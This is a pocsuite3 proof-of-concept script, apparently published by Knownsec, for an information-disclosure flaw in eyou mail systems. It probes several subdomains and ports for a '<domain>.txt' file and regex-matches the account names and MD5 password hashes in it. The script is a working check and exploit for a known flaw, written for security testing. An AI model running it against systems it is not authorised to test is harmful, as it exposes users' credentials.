"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urlparse
import re
class DemoPOC(POCBase):
vulID = '1040' # ssvid
version = '1'
author = ['chenghs@knownsec.com']
vulDate = '2013-07-15'
createDate = '2013-08-15'
updateDate = '2013-08-15'
references = ['http://wooyun.org/bugs/wooyun-2013-028987']
name = 'eyou 信息泄露漏洞 POC'
appPowerLink = 'http://hosting.eyou.com'
appName = 'eyou'
appVersion = '#'
vulType = 'Information Disclosure'
desc = '''部分亿邮系统根目录下存在一个以“域名.txt”命名的文档,里面记录着所有用户的帐号和密码信息。'''
samples = []
install_requires = ['']
def get_domain(self, url):
'''返回顶级域名'''
ds = ['ac', 'ad', 'aeaero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar',
'arpa', 'as', 'asia', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg',
'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bzca',
'cat', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop',
'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'edu', 'ee',
'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge',
'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gov', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw',
'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'info', 'int',
'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jobs', 'jp', 'ke', 'kg', 'kh', 'ki', 'km',
'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu',
'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mil', 'mk', 'ml', 'mm', 'mn', 'mo',
'mobi', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'museum', 'mv', 'mw', 'mx', 'my', 'mz', 'na',
'name', 'nc', 'ne', 'net', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'pro', 'ps', 'pt', 'pw',
'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si',
'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tel',
'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'travel', 'tt', 'tv',
'tw', 'tz', 'ua', 'ug', 'uk', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu',
'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw']
target = urlparse(url).netloc.split(':')[0]
arr = target.split('.')
if arr[-2] in ds:
domain = str(arr[-3])
domain += '.' + str(arr[-2])
domain += '.' + str(arr[-1])
return domain
else:
domain = str(arr[-2])
domain += '.' + str(arr[-1])
return domain
def _verify(self):
result = {}
url = self.url
ports = ['80', '8080']
domains = ['mail', '', 'www']
if urlparse(url).netloc.split(':')[0].split('.')[-1].isdigit(): # 如果域名是IP,则不用替换子域名
domain = url.lstrip('http://')
domains = ['']
else:
domain = self.get_domain(url)
for i in domains:
for j in ports:
url = 'http://' + i + '.' + domain + ':' + j + '/' + domain + '.txt'
try:
response = requests.get(url).text
except:
continue
if response:
reg = re.compile(domain + "\:\{md5\}(.*?)\:")
res = reg.findall(response)
if res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
break
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
暂无评论